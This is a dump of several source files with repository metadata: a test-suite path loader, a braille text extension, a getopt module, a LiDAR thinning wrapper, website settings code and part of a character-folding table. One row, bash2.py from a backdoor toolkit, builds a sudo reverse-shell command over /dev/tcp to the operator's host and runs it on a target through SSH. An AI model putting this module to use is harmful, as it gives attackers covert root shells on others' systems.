repo_name (string, 6-100) | path (string, 4-294) | copies (string, 1-5) | size (string, 4-6) | content (string, 606-896k) | license (stringclasses, 15 values) | var_hash (int64) | doc_hash (int64) | line_mean (float64, 3.5-99.8) | line_max (int64, 13-999) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|---
sathnaga/virt-test | tools/common.py | 12 | 1426 |
import os, sys


def load_setup_modules(client_dir):
    try:
        sys.path.insert(0, client_dir)
        import setup_modules
    finally:
        sys.path.pop(0)
    return setup_modules


dirname = os.path.dirname(sys.modules[__name__].__file__)
virt_test_dir = os.path.abspath(os.path.join(dirname, ".."))
sys.path.insert(0, virt_test_dir)

try:
    import autotest.client.setup_modules as setup_modules
    client_dir = os.path.dirname(setup_modules.__file__)
    sm = setup_modules
except ImportError:
    try:
        client_dir = os.path.abspath(os.path.join(dirname, "..", "..", ".."))
        sm = load_setup_modules(client_dir)
    except:
        try:
            client_dir = os.path.join(os.environ['AUTOTEST_PATH'], 'client')
        except KeyError:
            print("Environment variable $AUTOTEST_PATH not set. "
                  "please set it to a path containing an autotest checkout")
            print("Or install the autotest-framework package for your distro")
            sys.exit(1)
        if not os.path.isdir(client_dir):
            print('Autotest client library directory was not found at: "%s"' %
                  client_dir)
            print('Please check if the environment variable "$AUTOTEST_PATH" '
                  'points to a valid location')
            sys.exit(1)
        sm = load_setup_modules(client_dir)

sm.setup(base_path=client_dir, root_module_name="autotest.client")
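# Summary of the lookup order above: an installed autotest.client package wins;
# otherwise a source checkout three directories up is tried; as a last resort
# $AUTOTEST_PATH/client is used. Whichever succeeds, setup_modules.setup() is
# called so that "autotest.client.*" imports resolve for the rest of virt-test.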
| gpl-2.0 | 3,440,179,515,862,722,000 | 8,432,146,919,563,892,000 | 36.526316 | 78 | 0.612202 | false |
sovaa/backdoorme | backdoors/shell/bash2.py | 1 | 1323 |
from backdoors.backdoor import *
import subprocess
import threading


class Bash2(Backdoor):
    prompt = Fore.RED + "(bash) " + Fore.BLUE + ">> " + Fore.RESET

    def __init__(self, core):
        cmd.Cmd.__init__(self)
        self.intro = GOOD + "Using second Bash module..."
        self.core = core
        self.options = {
            "port": Option("port", 53923, "port to connect to", True),
        }
        self.allow_modules = True
        self.modules = {}
        self.help_text = INFO + "A slightly different (and more reliable) version of the other bash backdoor, which does not prompt for the password on the client-side."

    def get_command(self):
        return "echo " + self.core.curtarget.pword + " | sudo -S nohup 0<&196;exec 196<>/dev/tcp/" + self.core.localIP + "/%s; sh <&196 >&196 2>&196" % self.get_value("port")

    def do_exploit(self, args):
        port = self.get_value("port")
        target = self.core.curtarget
        print(GOOD + "Initializing backdoor...")
        input("Run the following command: nc -vnlp %s in another shell to start the listener." % port)
        target.ssh.exec_command(self.get_command())
        for mod in self.modules.keys():
            print(INFO + "Attempting to execute " + mod.name + " module...")
            mod.exploit()
| mit | 205,024,602,839,075,650 | 2,466,526,990,982,905,300 | 41.677419 | 174 | 0.589569 | false |
tik0/inkscapeGrid | share/extensions/text_braille.py | 6 | 1177 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import chardataeffect, inkex, string
convert_table = {\
'a': unicode("⠁", "utf-8"),\
'b': unicode("⠃", "utf-8"),\
'c': unicode("⠉", "utf-8"),\
'd': unicode("⠙", "utf-8"),\
'e': unicode("⠑", "utf-8"),\
'f': unicode("⠋", "utf-8"),\
'g': unicode("⠛", "utf-8"),\
'h': unicode("⠓", "utf-8"),\
'i': unicode("⠊", "utf-8"),\
'j': unicode("⠚", "utf-8"),\
'k': unicode("⠅", "utf-8"),\
'l': unicode("⠇", "utf-8"),\
'm': unicode("⠍", "utf-8"),\
'n': unicode("⠝", "utf-8"),\
'o': unicode("⠕", "utf-8"),\
'p': unicode("⠏", "utf-8"),\
'q': unicode("⠟", "utf-8"),\
'r': unicode("⠗", "utf-8"),\
's': unicode("⠎", "utf-8"),\
't': unicode("⠞", "utf-8"),\
'u': unicode("⠥", "utf-8"),\
'v': unicode("⠧", "utf-8"),\
'w': unicode("⠺", "utf-8"),\
'x': unicode("⠭", "utf-8"),\
'y': unicode("⠽", "utf-8"),\
'z': unicode("⠵", "utf-8"),\
}
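# The values above are characters from the Unicode Braille Patterns block
# (U+2800-U+28FF), one six-dot cell per Latin letter, following the standard
# Grade-1 braille alphabet. Note the Python 2 idioms used in this extension:
# unicode(..., "utf-8") here and dict.has_key() below.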
class C(chardataeffect.CharDataEffect):

    def process_chardata(self, text, line, par):
        r = ""
        for c in text:
            if convert_table.has_key(c.lower()):
                r = r + convert_table[c.lower()]
            else:
                r = r + c
        return r

c = C()
c.affect()
| gpl-2.0 | -6,977,646,690,398,901,000 | 7,531,656,661,442,428,000 | 22.93617 | 45 | 0.468444 | false |
40223110/2015CDAFinal_test2 | static/Brython3.1.0-20150301-090019/Lib/getopt.py | 845 | 7488 |
"""Parser for command line options.
This module helps scripts to parse the command line arguments in
sys.argv. It supports the same conventions as the Unix getopt()
function (including the special meanings of arguments of the form `-'
and `--'). Long options similar to those supported by GNU software
may be used as well via an optional third argument. This module
provides two functions and an exception:
getopt() -- Parse command line options
gnu_getopt() -- Like getopt(), but allow option and non-option arguments
to be intermixed.
GetoptError -- exception (class) raised with 'opt' attribute, which is the
option involved with the exception.
"""
# Long option support added by Lars Wirzenius <[email protected]>.
#
# Gerrit Holl <[email protected]> moved the string-based exceptions
# to class-based exceptions.
#
# Peter Åstrand <[email protected]> added gnu_getopt().
#
# TODO for gnu_getopt():
#
# - GNU getopt_long_only mechanism
# - allow the caller to specify ordering
# - RETURN_IN_ORDER option
# - GNU extension with '-' as first character of option string
# - optional arguments, specified by double colons
# - a option string with a W followed by semicolon should
# treat "-W foo" as "--foo"
__all__ = ["GetoptError","error","getopt","gnu_getopt"]
import os
try:
    from gettext import gettext as _
except ImportError:
    # Bootstrapping Python: gettext's dependencies not built yet
    def _(s): return s


class GetoptError(Exception):
    opt = ''
    msg = ''

    def __init__(self, msg, opt=''):
        self.msg = msg
        self.opt = opt
        Exception.__init__(self, msg, opt)

    def __str__(self):
        return self.msg

error = GetoptError  # backward compatibility


def getopt(args, shortopts, longopts = []):
    """getopt(args, options[, long_options]) -> opts, args

    Parses command line options and parameter list.  args is the
    argument list to be parsed, without the leading reference to the
    running program.  Typically, this means "sys.argv[1:]".  shortopts
    is the string of option letters that the script wants to
    recognize, with options that require an argument followed by a
    colon (i.e., the same format that Unix getopt() uses).  If
    specified, longopts is a list of strings with the names of the
    long options which should be supported.  The leading '--'
    characters should not be included in the option name.  Options
    which require an argument should be followed by an equal sign
    ('=').

    The return value consists of two elements: the first is a list of
    (option, value) pairs; the second is the list of program arguments
    left after the option list was stripped (this is a trailing slice
    of the first argument).  Each option-and-value pair returned has
    the option as its first element, prefixed with a hyphen (e.g.,
    '-x'), and the option argument as its second element, or an empty
    string if the option has no argument.  The options occur in the
    list in the same order in which they were found, thus allowing
    multiple occurrences.  Long and short options may be mixed.
    """
    opts = []
    if type(longopts) == type(""):
        longopts = [longopts]
    else:
        longopts = list(longopts)
    while args and args[0].startswith('-') and args[0] != '-':
        if args[0] == '--':
            args = args[1:]
            break
        if args[0].startswith('--'):
            opts, args = do_longs(opts, args[0][2:], longopts, args[1:])
        else:
            opts, args = do_shorts(opts, args[0][1:], shortopts, args[1:])

    return opts, args


def gnu_getopt(args, shortopts, longopts = []):
    """getopt(args, options[, long_options]) -> opts, args

    This function works like getopt(), except that GNU style scanning
    mode is used by default. This means that option and non-option
    arguments may be intermixed. The getopt() function stops
    processing options as soon as a non-option argument is
    encountered.

    If the first character of the option string is `+', or if the
    environment variable POSIXLY_CORRECT is set, then option
    processing stops as soon as a non-option argument is encountered.
    """
    opts = []
    prog_args = []
    if isinstance(longopts, str):
        longopts = [longopts]
    else:
        longopts = list(longopts)

    # Allow options after non-option arguments?
    if shortopts.startswith('+'):
        shortopts = shortopts[1:]
        all_options_first = True
    elif os.environ.get("POSIXLY_CORRECT"):
        all_options_first = True
    else:
        all_options_first = False

    while args:
        if args[0] == '--':
            prog_args += args[1:]
            break

        if args[0][:2] == '--':
            opts, args = do_longs(opts, args[0][2:], longopts, args[1:])
        elif args[0][:1] == '-' and args[0] != '-':
            opts, args = do_shorts(opts, args[0][1:], shortopts, args[1:])
        else:
            if all_options_first:
                prog_args += args
                break
            else:
                prog_args.append(args[0])
                args = args[1:]

    return opts, prog_args


def do_longs(opts, opt, longopts, args):
    try:
        i = opt.index('=')
    except ValueError:
        optarg = None
    else:
        opt, optarg = opt[:i], opt[i+1:]

    has_arg, opt = long_has_args(opt, longopts)
    if has_arg:
        if optarg is None:
            if not args:
                raise GetoptError(_('option --%s requires argument') % opt, opt)
            optarg, args = args[0], args[1:]
    elif optarg is not None:
        raise GetoptError(_('option --%s must not have an argument') % opt, opt)
    opts.append(('--' + opt, optarg or ''))
    return opts, args


# Return:
#   has_arg?
#   full option name
def long_has_args(opt, longopts):
    possibilities = [o for o in longopts if o.startswith(opt)]
    if not possibilities:
        raise GetoptError(_('option --%s not recognized') % opt, opt)
    # Is there an exact match?
    if opt in possibilities:
        return False, opt
    elif opt + '=' in possibilities:
        return True, opt
    # No exact match, so better be unique.
    if len(possibilities) > 1:
        # XXX since possibilities contains all valid continuations, might be
        # nice to work them into the error msg
        raise GetoptError(_('option --%s not a unique prefix') % opt, opt)
    assert len(possibilities) == 1
    unique_match = possibilities[0]
    has_arg = unique_match.endswith('=')
    if has_arg:
        unique_match = unique_match[:-1]
    return has_arg, unique_match


def do_shorts(opts, optstring, shortopts, args):
    while optstring != '':
        opt, optstring = optstring[0], optstring[1:]
        if short_has_arg(opt, shortopts):
            if optstring == '':
                if not args:
                    raise GetoptError(_('option -%s requires argument') % opt,
                                      opt)
                optstring, args = args[0], args[1:]
            optarg, optstring = optstring, ''
        else:
            optarg = ''
        opts.append(('-' + opt, optarg))
    return opts, args


def short_has_arg(opt, shortopts):
    for i in range(len(shortopts)):
        if opt == shortopts[i] != ':':
            return shortopts.startswith(':', i+1)
    raise GetoptError(_('option -%s not recognized') % opt, opt)


if __name__ == '__main__':
    import sys
    print(getopt(sys.argv[1:], "a:b", ["alpha=", "beta"]))
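# Illustrative call, matching the demo above:
#     getopt(['-a', 'val', '--beta', 'rest'], 'a:b', ['alpha=', 'beta'])
# returns ([('-a', 'val'), ('--beta', '')], ['rest']): the parsed
# (option, value) pairs first, then the remaining positional arguments.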
| gpl-3.0 | -1,776,446,679,771,228,000 | -50,132,874,874,108,470 | 33.823256 | 80 | 0.620008 | false |
SebDieBln/QGIS | python/plugins/processing/algs/lidar/lastools/lasthin.py | 12 | 3757 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
lasthin.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Martin Isenburg'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Martin Isenburg'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterSelection
class lasthin(LAStoolsAlgorithm):

    THIN_STEP = "THIN_STEP"
    OPERATION = "OPERATION"
    OPERATIONS = ["lowest", "random", "highest"]
    WITHHELD = "WITHHELD"
    CLASSIFY_AS = "CLASSIFY_AS"
    CLASSIFY_AS_CLASS = "CLASSIFY_AS_CLASS"

    def defineCharacteristics(self):
        self.name, self.i18n_name = self.trAlgorithm('lasthin')
        self.group, self.i18n_group = self.trAlgorithm('LAStools')
        self.addParametersVerboseGUI()
        self.addParametersPointInputGUI()
        self.addParameter(ParameterNumber(lasthin.THIN_STEP,
            self.tr("size of grid used for thinning"), 0, None, 1.0))
        self.addParameter(ParameterSelection(lasthin.OPERATION,
            self.tr("keep particular point per cell"), lasthin.OPERATIONS, 0))
        self.addParameter(ParameterBoolean(lasthin.WITHHELD,
            self.tr("mark thinned-away points as withheld"), False))
        self.addParameter(ParameterBoolean(lasthin.CLASSIFY_AS,
            self.tr("classify surviving points as class"), False))
        self.addParameter(ParameterNumber(lasthin.CLASSIFY_AS_CLASS,
            self.tr("class"), 0, None, 8))
        self.addParametersPointOutputGUI()
        self.addParametersAdditionalGUI()

    def processAlgorithm(self, progress):
        commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasthin")]
        self.addParametersVerboseCommands(commands)
        self.addParametersPointInputCommands(commands)
        step = self.getParameterValue(lasthin.THIN_STEP)
        if step != 0.0:
            commands.append("-step")
            commands.append(unicode(step))
        operation = self.getParameterValue(lasthin.OPERATION)
        if operation != 0:
            commands.append("-" + self.OPERATIONS[operation])
        if self.getParameterValue(lasthin.WITHHELD):
            commands.append("-withheld")
        if self.getParameterValue(lasthin.CLASSIFY_AS):
            commands.append("-classify_as")
            commands.append(unicode(self.getParameterValue(lasthin.CLASSIFY_AS_CLASS)))
        self.addParametersPointOutputCommands(commands)
        self.addParametersAdditionalCommands(commands)

        LAStoolsUtils.runLAStools(commands, progress)
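# processAlgorithm() assembles an argument list for the external lasthin binary
# (e.g. ["<LAStools>/bin/lasthin", "-step", "2.0", "-withheld", ...]) and hands
# it to LAStoolsUtils.runLAStools(); the exact flags depend on the parameter
# values chosen in the dialog and on the addParameters* helper methods.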
| gpl-2.0 | 5,616,160,028,502,209,000 | 594,594,614,412,359,000 | 45.382716 | 111 | 0.573064 | false |
indictranstech/reciphergroup-frappe | frappe/website/doctype/website_settings/website_settings.py | 27 | 4297 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import get_request_site_address, encode
from frappe.model.document import Document
from urllib import quote
from frappe.website.router import resolve_route
from frappe.website.doctype.website_theme.website_theme import add_website_theme
class WebsiteSettings(Document):
    def validate(self):
        self.validate_top_bar_items()
        self.validate_footer_items()
        self.validate_home_page()

    def validate_home_page(self):
        if frappe.flags.in_install:
            return
        if self.home_page and not resolve_route(self.home_page):
            frappe.msgprint(_("Invalid Home Page") + " (Standard pages - index, login, products, blog, about, contact)")
            self.home_page = ''

    def validate_top_bar_items(self):
        """validate url in top bar items"""
        for top_bar_item in self.get("top_bar_items"):
            if top_bar_item.parent_label:
                parent_label_item = self.get("top_bar_items", {"label": top_bar_item.parent_label})
                if not parent_label_item:
                    # invalid item
                    frappe.throw(_("{0} does not exist in row {1}").format(top_bar_item.parent_label, top_bar_item.idx))
                elif not parent_label_item[0] or parent_label_item[0].url:
                    # parent cannot have url
                    frappe.throw(_("{0} in row {1} cannot have both URL and child items").format(top_bar_item.parent_label,
                        top_bar_item.idx))

    def validate_footer_items(self):
        """clear parent label in footer"""
        for footer_item in self.get("footer_items"):
            footer_item.parent_label = None

    def on_update(self):
        self.clear_cache()

    def clear_cache(self):
        # make js and css
        # clear web cache (for menus!)
        from frappe.sessions import clear_cache
        clear_cache('Guest')

        from frappe.website.render import clear_cache
        clear_cache()

        # clears role based home pages
        frappe.clear_cache()


def get_website_settings():
    hooks = frappe.get_hooks()
    all_top_items = frappe.db.sql("""\
        select * from `tabTop Bar Item`
        where parent='Website Settings' and parentfield='top_bar_items'
        order by idx asc""", as_dict=1)

    top_items = [d for d in all_top_items if not d['parent_label']]

    # attach child items to top bar
    for d in all_top_items:
        if d['parent_label']:
            for t in top_items:
                if t['label'] == d['parent_label']:
                    if not 'child_items' in t:
                        t['child_items'] = []
                    t['child_items'].append(d)
                    break

    context = frappe._dict({
        'top_bar_items': top_items,
        'footer_items': frappe.db.sql("""\
            select * from `tabTop Bar Item`
            where parent='Website Settings' and parentfield='footer_items'
            order by idx asc""", as_dict=1),
        "post_login": [
            {"label": "My Account", "url": "/me"},
            {"class": "divider"},
            {"label": "Logout", "url": "/?cmd=web_logout"}
        ]
    })

    settings = frappe.get_doc("Website Settings", "Website Settings")
    for k in ["banner_html", "brand_html", "copyright", "twitter_share_via",
              "facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
              "disable_signup", "hide_footer_signup", "head_html"]:
        if hasattr(settings, k):
            context[k] = settings.get(k)

    if settings.address:
        context["footer_address"] = settings.address

    for k in ["facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
              "disable_signup"]:
        context[k] = int(context.get(k) or 0)

    if frappe.request:
        context.url = quote(str(get_request_site_address(full_address=True)), safe="/:")
        context.encoded_title = quote(encode(context.title or ""), str(""))

    for update_website_context in hooks.update_website_context or []:
        frappe.get_attr(update_website_context)(context)

    context.web_include_js = hooks.web_include_js or []
    context.web_include_css = hooks.web_include_css or []

    via_hooks = frappe.get_hooks("website_context")
    for key in via_hooks:
        context[key] = via_hooks[key]
        if key not in ("top_bar_items", "footer_items", "post_login") \
                and isinstance(context[key], (list, tuple)):
            context[key] = context[key][0]

    add_website_theme(context)

    if not context.get("favicon"):
        context["favicon"] = "/assets/frappe/images/favicon.png"

    if settings.favicon and settings.favicon != "attach_files:":
        context["favicon"] = settings.favicon

    return context
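# get_website_settings() is the website context builder: it loads the top bar
# and footer items from `tabTop Bar Item`, copies selected Website Settings
# fields (branding, share buttons, signup flags) into a frappe._dict, lets any
# hooks.update_website_context callables mutate the context, applies the website
# theme, and falls back to the bundled favicon when none is configured.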
| mit | -7,714,535,708,371,818,000 | 3,703,330,806,336,435,700 | 30.364964 | 111 | 0.685595 | false |
hzlf/openbroadcast.org | website/base/utils/fold_to_ascii/mapping.py | 2 | 27241 |
# -*- coding: utf-8 -*-
"""
Mappings suitable for translate tables.
"""
# To see printed representation of character `k`:
# print(unichr(k))
#
# ASCII characters replace to themselves.
codepoint_to_self = [
(0x0, u"\x00"),
(0x1, u"\x01"),
(0x2, u"\x02"),
(0x3, u"\x03"),
(0x4, u"\x04"),
(0x5, u"\x05"),
(0x6, u"\x06"),
(0x7, u"\x07"),
(0x8, u"\x08"),
(0x9, u"\t"),
(0xA, u"\n"),
(0xB, u"\x0b"),
(0xC, u"\x0c"),
(0xD, u"\r"),
(0xE, u"\x0e"),
(0xF, u"\x0f"),
(0x10, u"\x10"),
(0x11, u"\x11"),
(0x12, u"\x12"),
(0x13, u"\x13"),
(0x14, u"\x14"),
(0x15, u"\x15"),
(0x16, u"\x16"),
(0x17, u"\x17"),
(0x18, u"\x18"),
(0x19, u"\x19"),
(0x1A, u"\x1a"),
(0x1B, u"\x1b"),
(0x1C, u"\x1c"),
(0x1D, u"\x1d"),
(0x1E, u"\x1e"),
(0x1F, u"\x1f"),
(0x20, u" "),
(0x21, u"!"),
(0x22, u'"'),
(0x23, u"#"),
(0x24, u"$"),
(0x25, u"%"),
(0x26, u"&"),
(0x27, u"'"),
(0x28, u"("),
(0x29, u")"),
(0x2A, u"*"),
(0x2B, u"+"),
(0x2C, u","),
(0x2D, u"-"),
(0x2E, u"."),
(0x2F, u"/"),
(0x30, u"0"),
(0x31, u"1"),
(0x32, u"2"),
(0x33, u"3"),
(0x34, u"4"),
(0x35, u"5"),
(0x36, u"6"),
(0x37, u"7"),
(0x38, u"8"),
(0x39, u"9"),
(0x3A, u":"),
(0x3B, u";"),
(0x3C, u"<"),
(0x3D, u"="),
(0x3E, u">"),
(0x3F, u"?"),
(0x40, u"@"),
(0x41, u"A"),
(0x42, u"B"),
(0x43, u"C"),
(0x44, u"D"),
(0x45, u"E"),
(0x46, u"F"),
(0x47, u"G"),
(0x48, u"H"),
(0x49, u"I"),
(0x4A, u"J"),
(0x4B, u"K"),
(0x4C, u"L"),
(0x4D, u"M"),
(0x4E, u"N"),
(0x4F, u"O"),
(0x50, u"P"),
(0x51, u"Q"),
(0x52, u"R"),
(0x53, u"S"),
(0x54, u"T"),
(0x55, u"U"),
(0x56, u"V"),
(0x57, u"W"),
(0x58, u"X"),
(0x59, u"Y"),
(0x5A, u"Z"),
(0x5B, u"["),
(0x5C, u"\\"),
(0x5D, u"]"),
(0x5E, u"^"),
(0x5F, u"_"),
(0x60, u"`"),
(0x61, u"a"),
(0x62, u"b"),
(0x63, u"c"),
(0x64, u"d"),
(0x65, u"e"),
(0x66, u"f"),
(0x67, u"g"),
(0x68, u"h"),
(0x69, u"i"),
(0x6A, u"j"),
(0x6B, u"k"),
(0x6C, u"l"),
(0x6D, u"m"),
(0x6E, u"n"),
(0x6F, u"o"),
(0x70, u"p"),
(0x71, u"q"),
(0x72, u"r"),
(0x73, u"s"),
(0x74, u"t"),
(0x75, u"u"),
(0x76, u"v"),
(0x77, u"w"),
(0x78, u"x"),
(0x79, u"y"),
(0x7A, u"z"),
(0x7B, u"{"),
(0x7C, u"|"),
(0x7D, u"}"),
(0x7E, u"~"),
]
codepoint_to_replacement = [
(0xC0, u"A"),
(0xC1, u"A"),
(0xC2, u"A"),
(0xC3, u"A"),
(0xC4, u"A"),
(0xC5, u"A"),
(0x100, u"A"),
(0x102, u"A"),
(0x104, u"A"),
(0x18F, u"A"),
(0x1CD, u"A"),
(0x1DE, u"A"),
(0x1E0, u"A"),
(0x1FA, u"A"),
(0x200, u"A"),
(0x202, u"A"),
(0x226, u"A"),
(0x23A, u"A"),
(0x1D00, u"A"),
(0x1E00, u"A"),
(0x1EA0, u"A"),
(0x1EA2, u"A"),
(0x1EA4, u"A"),
(0x1EA6, u"A"),
(0x1EA8, u"A"),
(0x1EAA, u"A"),
(0x1EAC, u"A"),
(0x1EAE, u"A"),
(0x1EB0, u"A"),
(0x1EB2, u"A"),
(0x1EB4, u"A"),
(0x1EB6, u"A"),
(0x24B6, u"A"),
(0xFF21, u"A"),
(0xE0, u"a"),
(0xE1, u"a"),
(0xE2, u"a"),
(0xE3, u"a"),
(0xE4, u"a"),
(0xE5, u"a"),
(0x101, u"a"),
(0x103, u"a"),
(0x105, u"a"),
(0x1CE, u"a"),
(0x1DF, u"a"),
(0x1E1, u"a"),
(0x1FB, u"a"),
(0x201, u"a"),
(0x203, u"a"),
(0x227, u"a"),
(0x250, u"a"),
(0x259, u"a"),
(0x25A, u"a"),
(0x1D8F, u"a"),
(0x1D95, u"a"),
(0x1E01, u"a"),
(0x1E9A, u"a"),
(0x1EA1, u"a"),
(0x1EA3, u"a"),
(0x1EA5, u"a"),
(0x1EA7, u"a"),
(0x1EA9, u"a"),
(0x1EAB, u"a"),
(0x1EAD, u"a"),
(0x1EAF, u"a"),
(0x1EB1, u"a"),
(0x1EB3, u"a"),
(0x1EB5, u"a"),
(0x1EB7, u"a"),
(0x2090, u"a"),
(0x2094, u"a"),
(0x24D0, u"a"),
(0x2C65, u"a"),
(0x2C6F, u"a"),
(0xFF41, u"a"),
(0xA732, u"AA"),
(0xC6, u"AE"),
(0x1E2, u"AE"),
(0x1FC, u"AE"),
(0x1D01, u"AE"),
(0xA734, u"AO"),
(0xA736, u"AU"),
(0xA738, u"AV"),
(0xA73A, u"AV"),
(0xA73C, u"AY"),
(0x249C, u"(a)"),
(0xA733, u"aa"),
(0xE6, u"ae"),
(0x1E3, u"ae"),
(0x1FD, u"ae"),
(0x1D02, u"ae"),
(0xA735, u"ao"),
(0xA737, u"au"),
(0xA739, u"av"),
(0xA73B, u"av"),
(0xA73D, u"ay"),
(0x181, u"B"),
(0x182, u"B"),
(0x243, u"B"),
(0x299, u"B"),
(0x1D03, u"B"),
(0x1E02, u"B"),
(0x1E04, u"B"),
(0x1E06, u"B"),
(0x24B7, u"B"),
(0xFF22, u"B"),
(0x180, u"b"),
(0x183, u"b"),
(0x253, u"b"),
(0x1D6C, u"b"),
(0x1D80, u"b"),
(0x1E03, u"b"),
(0x1E05, u"b"),
(0x1E07, u"b"),
(0x24D1, u"b"),
(0xFF42, u"b"),
(0x249D, u"(b)"),
(0xC7, u"C"),
(0x106, u"C"),
(0x108, u"C"),
(0x10A, u"C"),
(0x10C, u"C"),
(0x187, u"C"),
(0x23B, u"C"),
(0x297, u"C"),
(0x1D04, u"C"),
(0x1E08, u"C"),
(0x24B8, u"C"),
(0xFF23, u"C"),
(0xE7, u"c"),
(0x107, u"c"),
(0x109, u"c"),
(0x10B, u"c"),
(0x10D, u"c"),
(0x188, u"c"),
(0x23C, u"c"),
(0x255, u"c"),
(0x1E09, u"c"),
(0x2184, u"c"),
(0x24D2, u"c"),
(0xA73E, u"c"),
(0xA73F, u"c"),
(0xFF43, u"c"),
(0x249E, u"(c)"),
(0xD0, u"D"),
(0x10E, u"D"),
(0x110, u"D"),
(0x189, u"D"),
(0x18A, u"D"),
(0x18B, u"D"),
(0x1D05, u"D"),
(0x1D06, u"D"),
(0x1E0A, u"D"),
(0x1E0C, u"D"),
(0x1E0E, u"D"),
(0x1E10, u"D"),
(0x1E12, u"D"),
(0x24B9, u"D"),
(0xA779, u"D"),
(0xFF24, u"D"),
(0xF0, u"d"),
(0x10F, u"d"),
(0x111, u"d"),
(0x18C, u"d"),
(0x221, u"d"),
(0x256, u"d"),
(0x257, u"d"),
(0x1D6D, u"d"),
(0x1D81, u"d"),
(0x1D91, u"d"),
(0x1E0B, u"d"),
(0x1E0D, u"d"),
(0x1E0F, u"d"),
(0x1E11, u"d"),
(0x1E13, u"d"),
(0x24D3, u"d"),
(0xA77A, u"d"),
(0xFF44, u"d"),
(0x1C4, u"DZ"),
(0x1F1, u"DZ"),
(0x1C5, u"Dz"),
(0x1F2, u"Dz"),
(0x249F, u"(d)"),
(0x238, u"db"),
(0x1C6, u"dz"),
(0x1F3, u"dz"),
(0x2A3, u"dz"),
(0x2A5, u"dz"),
(0xC8, u"E"),
(0xC9, u"E"),
(0xCA, u"E"),
(0xCB, u"E"),
(0x112, u"E"),
(0x114, u"E"),
(0x116, u"E"),
(0x118, u"E"),
(0x11A, u"E"),
(0x18E, u"E"),
(0x190, u"E"),
(0x204, u"E"),
(0x206, u"E"),
(0x228, u"E"),
(0x246, u"E"),
(0x1D07, u"E"),
(0x1E14, u"E"),
(0x1E16, u"E"),
(0x1E18, u"E"),
(0x1E1A, u"E"),
(0x1E1C, u"E"),
(0x1EB8, u"E"),
(0x1EBA, u"E"),
(0x1EBC, u"E"),
(0x1EBE, u"E"),
(0x1EC0, u"E"),
(0x1EC2, u"E"),
(0x1EC4, u"E"),
(0x1EC6, u"E"),
(0x24BA, u"E"),
(0x2C7B, u"E"),
(0xFF25, u"E"),
(0xE8, u"e"),
(0xE9, u"e"),
(0xEA, u"e"),
(0xEB, u"e"),
(0x113, u"e"),
(0x115, u"e"),
(0x117, u"e"),
(0x119, u"e"),
(0x11B, u"e"),
(0x1DD, u"e"),
(0x205, u"e"),
(0x207, u"e"),
(0x229, u"e"),
(0x247, u"e"),
(0x258, u"e"),
(0x25B, u"e"),
(0x25C, u"e"),
(0x25D, u"e"),
(0x25E, u"e"),
(0x29A, u"e"),
(0x1D08, u"e"),
(0x1D92, u"e"),
(0x1D93, u"e"),
(0x1D94, u"e"),
(0x1E15, u"e"),
(0x1E17, u"e"),
(0x1E19, u"e"),
(0x1E1B, u"e"),
(0x1E1D, u"e"),
(0x1EB9, u"e"),
(0x1EBB, u"e"),
(0x1EBD, u"e"),
(0x1EBF, u"e"),
(0x1EC1, u"e"),
(0x1EC3, u"e"),
(0x1EC5, u"e"),
(0x1EC7, u"e"),
(0x2091, u"e"),
(0x24D4, u"e"),
(0x2C78, u"e"),
(0xFF45, u"e"),
(0x24A0, u"(e)"),
(0x191, u"F"),
(0x1E1E, u"F"),
(0x24BB, u"F"),
(0xA730, u"F"),
(0xA77B, u"F"),
(0xA7FB, u"F"),
(0xFF26, u"F"),
(0x192, u"f"),
(0x1D6E, u"f"),
(0x1D82, u"f"),
(0x1E1F, u"f"),
(0x1E9B, u"f"),
(0x24D5, u"f"),
(0xA77C, u"f"),
(0xFF46, u"f"),
(0x24A1, u"(f)"),
(0xFB00, u"ff"),
(0xFB03, u"ffi"),
(0xFB04, u"ffl"),
(0xFB01, u"fi"),
(0xFB02, u"fl"),
(0x11C, u"G"),
(0x11E, u"G"),
(0x120, u"G"),
(0x122, u"G"),
(0x193, u"G"),
(0x1E4, u"G"),
(0x1E5, u"G"),
(0x1E6, u"G"),
(0x1E7, u"G"),
(0x1F4, u"G"),
(0x262, u"G"),
(0x29B, u"G"),
(0x1E20, u"G"),
(0x24BC, u"G"),
(0xA77D, u"G"),
(0xA77E, u"G"),
(0xFF27, u"G"),
(0x11D, u"g"),
(0x11F, u"g"),
(0x121, u"g"),
(0x123, u"g"),
(0x1F5, u"g"),
(0x260, u"g"),
(0x261, u"g"),
(0x1D77, u"g"),
(0x1D79, u"g"),
(0x1D83, u"g"),
(0x1E21, u"g"),
(0x24D6, u"g"),
(0xA77F, u"g"),
(0xFF47, u"g"),
(0x24A2, u"(g)"),
(0x124, u"H"),
(0x126, u"H"),
(0x21E, u"H"),
(0x29C, u"H"),
(0x1E22, u"H"),
(0x1E24, u"H"),
(0x1E26, u"H"),
(0x1E28, u"H"),
(0x1E2A, u"H"),
(0x24BD, u"H"),
(0x2C67, u"H"),
(0x2C75, u"H"),
(0xFF28, u"H"),
(0x125, u"h"),
(0x127, u"h"),
(0x21F, u"h"),
(0x265, u"h"),
(0x266, u"h"),
(0x2AE, u"h"),
(0x2AF, u"h"),
(0x1E23, u"h"),
(0x1E25, u"h"),
(0x1E27, u"h"),
(0x1E29, u"h"),
(0x1E2B, u"h"),
(0x1E96, u"h"),
(0x24D7, u"h"),
(0x2C68, u"h"),
(0x2C76, u"h"),
(0xFF48, u"h"),
(0x1F6, u"HV"),
(0x24A3, u"(h)"),
(0x195, u"hv"),
(0xCC, u"I"),
(0xCD, u"I"),
